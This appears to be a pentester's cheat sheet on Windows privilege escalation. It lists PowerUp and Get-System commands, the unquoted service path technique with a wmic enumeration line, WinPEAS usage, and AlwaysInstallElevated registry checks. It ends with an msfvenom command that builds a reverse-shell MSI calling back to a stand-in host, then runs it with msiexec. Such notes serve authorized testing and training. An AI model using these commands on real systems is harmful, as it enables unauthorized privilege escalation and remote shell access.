# Privilege Escalation ### PowerShellMafia Try to use dev brach always. PowerView has some cool functions to use. * * ```py powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks" powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System" ``` ### Unquoted Service Paths Let's say we have a system path like below. `C:\Program Files\IObit\Advanced SystemCare\ASCService.exe` Windows will first try execute it like below in the following order * `c:\program.exe` * `C:\Program Files\IObit\Advanced.exe` * `C:\Program Files\IObit\Advanced SystemCare\ASCService.exe` If we can plant the exe in one of the paths below we can elevate privileges * Please note that we need to either have the ability to restart the machine or restart the service. Otherwise it's useless kinda. #### Enumerating unquoted service paths ```py wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v ``` ### WinPeas It is a great privilege escalation enumeration tool. Find the releases below and simply execute the binary. * ``` .\winPEASx64_ofs.exe notcolor quiet ``` ### Seatbelt * ### Always Install Elevated * [https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/#:\~:text=For%20this%20purpose%2C%20the%20AlwaysInstallElevated,any%20program%20on%20the%20system.](https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/) Detecting if the OS is vulnerable, ``` reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer ``` If always install elevated is enabled, queries above should return 1. Exploiting it is pretty simple. Generate an msi payload, ``` msfvenom -p windows/shell/reverse_tcp lhost=1.3.3.7 lport=9001 -f msi > shell.msi ``` Execute it, ``` msiexec /quiet /qn /i 1.msi ```